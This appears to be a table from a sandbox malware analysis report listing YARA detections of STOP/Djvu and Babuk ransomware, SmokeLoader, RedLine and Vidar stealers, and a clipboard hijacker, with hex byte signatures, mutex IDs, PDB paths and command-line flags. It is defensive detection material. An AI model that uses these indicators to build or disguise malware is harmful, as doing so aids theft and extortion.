00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x224:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x224:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6936:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x221f0:$s1: JohnDoe 0x31f80:$s1: JohnDoe 0x221e8:$s2: HAL9TH
00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x624:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xd20:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7136:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Process Memory Space: E609.exe PID: 6956	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 6956	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x40c8f:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E609.exe PID: 7048	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 7048	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3bea2:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E609.exe PID: 2844	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 2844	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x48ad2:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E609.exe PID: 2764	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 2764	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: E609.exe PID: 2764	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x48c8e:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E609.exe PID: 5688	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 5688	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x47e6a:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E609.exe PID: 5436	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 5436	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: E609.exe PID: 5436	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4448c:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: build2.exe PID: 7144	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 7144	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: build2.exe PID: 5316	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 5316	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: build2.exe PID: 5316	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build2.exe PID: 5316	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: E609.exe PID: 6008	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 6008	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3ba64:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E609.exe PID: 3128	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 3128	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4c44b:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E609.exe PID: 916	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 916	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x419da:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: E609.exe PID: 4956	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: E609.exe PID: 4956	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x4027a:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 90 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
32.2.mstsca.exe.8a15a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
32.2.mstsca.exe.8a15a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
32.2.mstsca.exe.8a15a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
35.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
35.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
35.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
26.2.build3.exe.9715a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
26.2.build3.exe.9715a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
35.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
35.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
35.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
28.2.build3.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
28.2.build3.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
28.2.build3.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
28.2.build3.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
28.2.build3.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
28.2.build3.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
26.2.build3.exe.9715a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
26.2.build3.exe.9715a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
26.2.build3.exe.9715a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
32.2.mstsca.exe.8a15a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
